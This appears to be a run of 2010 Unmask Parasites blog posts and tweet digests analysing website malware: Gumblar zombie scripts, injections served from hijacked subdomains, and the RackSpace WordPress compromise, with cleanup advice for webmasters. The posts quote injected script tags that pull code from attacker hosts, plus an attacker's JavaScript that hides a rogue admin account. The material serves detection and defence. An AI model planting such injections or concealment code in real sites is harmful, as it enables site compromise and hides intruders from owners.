July 21, 2010

[zdnet.com] Adobe adding ’sandbox’ to PDF Reader to ward off hacker attacks

[h-online.com] Mozilla releases Firefox & Thunderbird security updates – 14 security issues addressed in FireFox update

July 22, 2010

[badwarebusters.org] There is a malware attack that only affects sites built with Soholaunch (affected sites via Google diagnostics)

Updated my list of Gumblar zombie URLs – now 1125 items

July 23, 2010

[milestone] 750,000 web pages checked by Unmask Parasites http://www.UnmaskParasites.com

[h-online.com] vBulletin divulges MySQL login – version 3.8.6 is vulnerable

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

July 12, 2010

A lot of WordPress blogs on RackSpace Cloud are still hacked

July 13, 2010

Someone promotes shoponline2011 site via Image search spam. Check Alexa traffic details

July 15, 2010

Just found an #nginx site that redirects search traffic to scareware sites. Previously, such hacks were limited to Apache (mainly)

@baldown Good point. I forgot about this config where nginx is just a reverse proxy for Apache. Thanks.

July 16, 2010

WordPress Redirect Exploit (on MediaTemple)  and suggested clean-up (redirect to qooglesearch .com)

If http://www.UnmaskParasites.com reports script from “ae.awaue .com” for your WP blog, check this

[netcraft.com] Firefox security test add-on was backdoored

July 17, 2010

[forbes.com] “Millions” Of Home Routers Vulnerable To Web Hack

RT @gcluley: Video and detailed analysis of new zero-day Windows .LNK shortcut vulnerability (via @ChetWisniewski)

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

June 28, 2010

added some more hijacked subdomains (rogue DNS records of legitimate domains) – it’s definitely a trend

Updated my list of Gumblar zombie URLs – now 1,000+ items. Analysis will follow soon.

Another SQL injection attack against ASP(.NET) sites. – thousands of affected sites.

@peterkruse told me that SQL injection attack was Asprox. Indeed, M86 Security described this very attack here

June 29, 2010

via @briankrebs : There’s a critical security update for Adobe Reader – but the update process is somewhat “tricky”

[h-online.com] Google integrates safe PDF viewer in Chrome – Adobe Reader may become unneeded one day

June 30, 2010

just decoded a malicious PHP code. It had 20 !!! levels of obfuscation!!! What an overkill and waste of CPU!

RT @mattcutts: Webspam projects in 2010? – what projects do you think Google webspam should work on in 2010+?

RT @JohnMu: Loving the new http://waybackmachine.org/ — try it out with one of your old sites :)

July 1, 2010

[blog] Happy 2nd Birthday, Unmask Parasites! + comparison of the 1st and the 2nd years. Steady growth :)

[h-online.com] Trojan attacks now almost solely from legitimate websites - only 1% of threats come from adult sites

July 2, 2010

[securityweek.com] New Tool Reveals Internet Passwords – trojans can use such tricks too. Do you save passwords in IE?

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

A year ago I posted some statistics. Let’s compare the first two years.

-

-

As you can see, the service steadily grows and gains popularity. I hope, this trend will continue ;-)

If you like Unmask Parasites and want to support this project, please spread the word about it. Consider linking to it. Write a testimonial. Suggest your ideas.

You can also subscribe to this blog’s RSS feed or follow me on Twitter.

Related posts:

• Happy Birthday Unmask Parasites!
• Unmask Parasites. A Year of Blogging.
• Let’s Unmask Parasites

This week the list has reached the level of 1,000+ URLs. Although it’s just a small part of all Gumblar zombie scripts, this list makes a good base for a quick analysis of Gumblar zombie URLs.

What is a Gumblar zombie script?

On some compromised websites, Gumblar creates a new file with a .php extension. A link to this file is injected to other compromised sites.

<script src=hxxp://hacked-site.com/subdirectory/zombie-script.php ></script>

This script either tries to attack web surfers’ computer silently loading binary exploit files from the same zombie site, or load yet another zombie script from a third-party zombie site.

The zombie scripts are not linked to from any existing files on the same zombie site. Their are hidden somewhere in the directory structure and have names that look very trustworthy to site owners (they usually have a name of some existing legitimate file but with a .php extension). This is why webmasters of compromised sites (Gumblars zombies) are usually completely unaware of such scripts on their sites (and as a result they are usually puzzled over why Google has blacklisted their sites and says their sites host malicious content and infect other sites). Although my list is not complete, it helps webmasters locate zombie scripts on their sites.

And the below analysis of this list reveals interesting details both about the Gumblar attack and about its zombie URLs.

Analysis

I analyzed 1042 Gumblar zombie URL.

Top level domains

The attack affects sites all over the world. My list contains sites with 73 different top level domains. Of course, .com sites (as the most wide-spread) are the most affected.

------------------- Top 10 TLDs ---------------------
1 .com 452 43.4%
2 .net 77 7.4%
3 .ru 57 5.5%
4 .org 48 4.6%
5 .hu 37 3.6%
6 .de 32 3.1%
7 .in 25 2.4%
8 .pl 23 2.2%
9 .kr 23 2.2%
10 .ar 17 1.6%
: the rest 251 24.1%


File names

1042 URLs contain 749 unique filenames. As I already told you, the names are usually a combination of a name of some existing file and a .php extension. So no wonder, the most popular name of a zombie script is index.php. However, sometimes hackers use a filename (specific to the Gumblar attack) that doesn’t match any filenames of existing files – gifimg.php. It the the second most popular name of Gumblar zombie scripts.

---------------- Top 10 Filenames -------------------
1 index.php 73 7.0%
2 gifimg.php 55 5.3%
3 contact.php 13 1.2%
4 style.php 9 0.9%
5 error_log.php 8 0.8%
6 _vti_inf.php 8 0.8%
7 LICENSE.php 8 0.8%
8 favicon.php 7 0.7%
9 .ftpquota.php 7 0.7%
10 robots.php 7 0.7%
: the rest 847 81.3%

Directories

To make zombie scripts less prominent, hackers create them in subdirectories of hacked sites. In my list of 1042 URLs I found 562 unique paths (excluding filenames) to the rogue scripts. The most popular location of Gumblar zombie scripts is the /images directory (16.5%). It’s a very good location to hide malicious files — webmasters rarely check directories with image files when they are searching for something that can contain executable code. Moreover, if a file has some benign filename (e.g. gifimg) it can be easily overlooked. Other service directories (e.g. /cgi-bin, /_vti_bin, /css, /tmp, /js) are also among popular locations.

The tenth position is empty. This means that in less than 1% of cases the zombie script was found directly in the site root directory.

----------------- Top 10 directories ----------------
1 /images 172 16.5%
2 /cgi-bin 24 2.3%
3 /_vti_bin 21 2.0%
4 /css 18 1.7%
5 /img 15 1.4%
6 /tmp 13 1.2%
7 /wp-content 12 1.2%
8 /js 10 1.0%
9 /wp-admin 10 1.0%
10 9 0.9%
: the rest 738 70.8%


Subdirectory levels

In majority of cases (91.5%), zombie scripts can be found in a subdirectory one level deep. E.g. /images/zombie.php, /tmp/zombie.php, etc. However, sometimes their location is as deep as 3 levels from site root. E.g. /_flash/_notes/vz29/zombie.php. In nine cases (<1%), zombie scripts were found in a root directory (0 levels deep)
---------- Location relative to site root -----------
1 1 level deep 953 91.5%
2 2 levels deep 56 5.4%
3 3 levels deep 24 2.3%
4 0 levels deep 9 0.9%

Web servers

Gumblar uses stolen FTP credentials to break into web sites. This means that regardless of web server technology any site is potentially vulnerable to this sort of attack (as long as webmasters use FTP). My list of Gumblar zombie URLs provide enough evidence to prove this. You can find filenames and directories specific to different web server technologies.

For example:

• .htaccess.php files — Apache
• _vti_bin directories and _vti_inf.php files — sites powered by Microsoft technologies
• WEB-INF/classes/v7j/servertest.class.php — Tomcat

“s” directories

On many websites, next to a Gumblar zombie script there is a directory called s. It contains Gumblar service and log files. If you find it on your server, make sure to delete it.

Have your say

Did you notice any other interesting patterns in the list of Gumblar zombie URLs? Your comments are welcome!

Related posts:

• List of Gumblar Zombie URLs
• Revenge of Gumblar Zombies
• Gumblar .cn Exploit – 12 Facts About This Injected Script
• 10 FTP Clients Malware Steals Credentials From

June 22, 2010

RT @mattcutts: New webmaster video: How do you protect your blog from hackers? – mostly about WordPress

June 24, 2010

[h-online.com] Firefox 3.6.4 adds crash protection, fixes vulnerabilities – not all vulnerabilities are fixed though

[status.mosso.com] Status update from RackSpace on the recent attack against WordPress sites

June 25, 2010

[h-online.com] Adobe brings forward security update for Reader – to be available on June 29

June 27, 2010

[status.mosso.com] new status update from RackSpace on their recent security incident

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

June 14, 2010

RT @briankrebs: A security heads-up for Microsoft XP users

June 15, 2010

More on RackSpace case: Backdoor scripts in WordPress mySql tables via @mvandemar

RT @briankrebs: Keylogger posts stolen data for world to see at pastebin.com

updated my post about RackSpace with info about the backdoor script in wp_options table

June 17, 2010

WordPress 3.0 has just been released.  Is your blog ready for this major update?

June 18, 2010

secure file and directory permissions on RackSpace Cloud – 600 and 700 are almost always the best choice

[wordpress.org] My summary of the RackSpace WordPress issue

June 19, 2010

[wordpress.org] some new details about the RackSpace WordPress issue

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

My visit to Google, Moscow last week ;)

In that article I wondered if that was a new trend (usage of virtually free hijacked subdomains) or just temporary approach that wouldn’t be used anywhere else. Well, this week I came across a different malware attack that also uses hijacked subdomains of legitimate websites.

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

<sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube.js"></sc ript>
<!--8469f3ebb36bebb12b39b0f9e7fe5933-->

The scripts reminds of many other attacks that used nginx reverse proxy on port 8080 on compromised servers (in this case this is true too).

Script names

I checked many infected sites and noticed that the injected scripts always used the same 5 subdomains and changed the file name part of the script from site to site. They always used Internet/computer related file names, e.g.: YouTube.js, Virtual_Reality.js, Backup.js, Unfriend.js, Keystroke.js, Access.js, Technology_Services.js, Page_View.js, Gigahertz.js, Telnet.js, Data_Type.js, Paste.js, Gnutella.js, Website.js, etc.

Hijacked subdomains

The 5 subdomains are (there may be more but I only seen these five):

• oployau .fancountblogger .com
• sorydory .russellhowe .com
• aospfpgy .dogplaystation .com
• kollinsoy .skyefenton .com
• temp .hbsouthmomsclub .com

Update: You can find many more hijacked subdomains in comments.

Each of them points to different IPs on different networks. And none of the IPs matches the IP (or even network) of their second-level domains.

All the second-level domains have been registered and now managed via GoDaddy. Some of them point to real legitimate websites and others are just parked domains.

It’s clear that hackers somehow gained access to those domains’ DNS management panel and created rogue DNS records for subdomains that legitimate domain owners cannot even imagine exist.

oployau.fancountblogger.com. 937 IN A 78.137.161.186
sorydory.russellhowe.com. 3530 IN A 88.198.25.170
aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23

This is the second attack in a short time that uses this approach to get free domain names to use in malware distribution. I guess, it is still to early to call this a trend, but it’s definitely something that we should keep an eye on.

To domain owners

When was the last time you checked DNS records of your domains? Are you sure there are no rogue subdomains that criminals use behind your back? Probably it’s time to check your domain settings now. But don’t forget about phishing attacks – make sure you are logging into a genuine site of your registrar. (Check GoDaddy’s security tips)

To webmasters

If you found one of the above scripts in your web pages (you can use Unmask Parasites to detect them) do the following:

1. Scan your computer for malware.
2. When you are sure it is clean, change all site passwords.
3. Don’t save new passwords in FTP clients (unless they provide a master key encryption)
4. If possible, use only secure file transfer protocols (e.g. SFTP or FTPS). Plain FTP is very insecure.
5. Remove the malicious scripts from files on server. Note, the scripts may also be injected into .js files. Sometimes hackers even create malicious .js files on compromised servers. If you don’t want to miss any infected files, consider removing everything and then restoring the site from a clean backup copy.
6. If your site is blacklisted by Google, you need to request a malware review via Google Webmaster Tools (Diagnostics -> Malware). You can read more about it in my guide.

Have your say

Do you know any other malware attacks that use hijacked subdomains of legitimate websites? Can we call this a new trend?

Related posts:

• Malware on Hijacked Subdomains. New Trend?
• 10 FTP Clients Malware Steals Credentials From
• Introduction to Website Parasites

Here’s the story

On Saturday, I received an email from one of Unmask Parasites users whose site had been blacklisted by Google.

He found a “fake admin” account in a WordPress control panel and a new file called “e.index”. And still he saw suspicious external scripts in his three blogs when he checked them in Unmask Parasites.

When I checked the sites, I found those scripts right after the first <div class=”entry”> tag on the index pages. Although they used different domains and subdomains, they looked pretty much the same:

1. <h5><script src=hxxp ://m808j .newsapis .us/js/jquery.min.js></script></h5>
2. <h5><script src=hxxp ://ee9kd .smartenergymodel .com/js/jquery.min.js></script></h5>
3. <h5><script src=hxxp ://w7c5lrhqu .newsapis .us/js/jquery.min.js></script></h5>

This is when I decided to investigate this case, and here is what I found…

Attack localization

1. I checked other sites on the same IP (64.49.219.218) and found many similarly hacked sites.

2. All hacked sites were WordPress blogs.

3. All versions of WordPress were affected (including the current stable version 2.9.2).

4. The IP belongs to RackSpace Cloud. When I checked WordPress blogs on neighbor RackSpace IPs, I found similarly hacked blogs on all of them in the range 64.49.219.194 – 252 and on 64.49.217.121. On RackSpace, sites are supposed to be stored in the cloud, so we can only guess how many physical servers those IPs refer to.

5. Majority of WordPress blogs seem to be affected. But not all. About 20% of checked blogs were free from the malicious scripts. Probably, some of them have been already cleaned up. Others are still waiting for their turn to be hacked (hackers could break into sites manually, one by one)

6. Many of the checked WordPress blogs also contain cloaked spammy links to pirated movies and software. This makes me think that hackers have been exploiting RackSpace Cloud servers for quite some time.

7. I couldn’t find any blogs affected by this attack on other networks. Most likely this attack is limited to certain RackSpace segments.

Details about the attack and speculations on its vector

I found an interesting thread on WordPress forum that says:

1. Hackers create a new admin user with username “amin” and name “…” (the name is three dots)

2. The hacked blogs are on RackSpace Cloud

3. Logs created by the “Admin Log” plugin show that this rogue “amin” user accessed blog and edited WordPress theme files.

4. Sometimes they inject base64-encode malicious iframes into theme files. They also create other encrypted files in various locations of the compromised sites. Some of them are PHP shells.

5. Moreover, the admin logs also show that the real name of that user is not “…“. In reality it contains many HTML tags and JavaScripts right after those three dots (they are stripped when WordPress displays the name on a web page).
...
<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if(n!=null && n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
var n=/>Administrator <span>\((\d+)\)</gi.exec(arr[i].innerHTML);
if(n!=null && n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator <span>\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
var n=/>All <span>\((\d+)\)</gi.exec(arr[i].innerHTML);
if(n!=null && n[1]>0){
var txt=arr[i].innerHTML.replace(/>All <span>\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script>
If I’m not mistaken, this code should hide the rogue user in the WordPress control panel. However, in recent versions of WordPress, values from database are properly sanitized (all tags are simply removed) and this code has no chance to be executed in a browser.

I played with the name parameter and could only duplicate admin logs with HTML tags if I inject them directly into the “usermeta” table bypassing WordPress altogether. This means that hackers have direct access to WordPress databases on RackSpace servers.

6. Hackers also injected the above mentioned scripts into the database entry of the most recent posts.

7. One of the posts in that thread also suggests that the attack vector is a vulnerable version (2.11.3) of phpMyAdmin used by RackSpace Cloud. If this is true, hackers must have targeted an XSRF attack at one of RackSpace admins with mySql root permissions to gain access to the whole database (probably created one more admin user). At this point, RackSpace has upgraded their phpMyAdmin nodes. Hope, they also found any changes in the database done by those hackers.

More about the malicious scripts

In one of JSUnpack reports, I found a decoded script that mentions 5 domain names that hackers used in this attack.

var doms = ['smartenergymodel.com', 'googleapis.biz', 'newsapis.us',
'emapis.org', 'toolbarinc.com'];

Indeed, on all affected sites, I found external scripts from subdomains of these five sites.

That report from jsunpack also suggests that initially hackers used only 5 subdomains:

var preffs = ['scripts.', 'library.', 'ajax.', 'toolbar.', 'inc.', 'java.']

They made the injected scripts look trustworthy. Just compare a legitimate script of jQuery library provided by Google with one of the malicious variants used in this attack:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
hxxp://ajax.googleapis.biz/js/jquery.min.js

However, now hackers use random meaningless subdomain names and change them from site to site. (Examples: nk0x.googleapis .biz, c8lk .newsapis .us, u6j.toolbarinc .com, awcdxvs1d.smartenergymodel .com, s56yqv3h.emapis .org)

Four of these domain names have been created on May 10, 2010, and one (smartenergymodel .com) has been updated on the same date.

All these sites (and their subdomains) are hosted on several servers of C I Host (Tampa, Florida). Here are their DNS records:

newsapis.us. 3600 IN A 66.221.228.26
newsapis.us. 3600 IN A 64.182.83.130
newsapis.us. 3600 IN A 66.221.165.153
-------------------------------------------------------
googleapis.biz. 3600 IN A 66.221.234.209
googleapis.biz. 3600 IN A 66.221.165.155
googleapis.biz. 3600 IN A 64.182.83.129
-------------------------------------------------------
emapis.org. 3600 IN A 66.221.224.205
emapis.org. 3600 IN A 66.221.165.151
emapis.org. 3600 IN A 64.182.83.132
-------------------------------------------------------
toolbarinc.com. 3600 IN A 66.221.165.149
toolbarinc.com. 3600 IN A 64.182.83.134
toolbarinc.com. 3600 IN A 66.221.224.191
-------------------------------------------------------
smartenergymodel.com. 3600 IN A 66.221.231.251
smartenergymodel.com. 3600 IN A 66.221.165.147
smartenergymodel.com. 3600 IN A 64.182.83.136

Their subdomains are also configured as A records.

The scripts serve malicious content under certain conditions only. As a result, Google currently blacklists only two domains (newsapis.us and googleapis.biz) out of five.

To webmasters

In this case, it is clear that webmasters can’t permanently resolve the problem until RackSpace locates and closes the security hole in their infrastructure. However, you can mitigate the damages from this attack if you act fast.

If you have a WordPress blog on a RackSpace Cloud, make sure to thoroughly check your site. Start with an Unmask Parasites scan. It can reveal the malicious external scripts, iframes and cloaked spammy links in your web pages.

In this case, scan the index page of your blog as the malicious code is injected into the most recent (at the time of the attack) post. If you publish more than 5-10 posts a day, you might also want to scan a couple of pages of previous posts.

Note, that in case of found scripts from smartenergymodel .com, toolbarinc .com, and emapis .org – Unmask Parasites doesn’t mark them as suspicious (since they are not currently blacklisted by Google), so you should thoroughly look through reports even if Unmask Parasites says that your pages seem to be clean. Anything that you didn’t add to your site yourself should be considered as suspicious.

If your site is compromised you should:

1. Scan you server for suspicious files and directories. Pay a special attention to files that contain base64-encoded strings. They usually contain code that starts with eval(base64_decode(… If you have a fresh backup, consider removing everything and then restoring your site from a clean backup copy.
2. Check WordPress and theme files for integrity. If you are not sure, just upgrade WordPress (even if it is the latest version already) or re-upload a genuine version of the theme (get it from either WorPress theme repository or from its author’s site)
3. Now that your WordPress version is at least 2.9.2 (the stable version at the moment), log into your WordPress admin interface and check if there is a user with name amin. You should delete it. Then change passwords of existing WordPress users.
4. Then check the content of your recent posts. At the very top of affected records you’ll see a malicious script inside <h5>..</h5> tags. You should remove such scripts. Please use something like NoScript in your browser so that those script don’t have a chance to get executed. Or use something like phpMyAdmin to check and clean the values of the “post_content” field in the mySql table “<your-prefix>_posts“.
   If you didn’t publish new articles during the last couple of weeks and have a fresh backup of the WordPress database, the easiest way to clean up your database is to restore a clean copy from a backup.
5. Now consider changing mySql passwords. Just in case.
6. Check your site every day. At least for a week. I’ve seen websites that had been cleaned up only to be reinfected a few hours later.
7. Regularly check RackSpace system status. They may post important updates there.

Update (June 15, 2010): Michael VanDeMar noticed that hackers also inject an encrypted backdoor PHP script into “wp_options” table. Among other things, it allows to modify WordPress database and inject spammy links into blog pages. For details on how to find the malicious DB entry please read his artcile.

On my side, I’ll send everything I know about this issue to security department of RackSpace. Hope they’ll be able to address this issue ASAP.

Your comments are welcome!

Do you have any additional information about this attack? I encourage you to take part in the discussion in comments.

Similar posts:

• Network Solutions and WordPress Security Flaw
• Hackers Abuse Servage Hosting to Poison Google Image Search
• Introduction to Website Parasites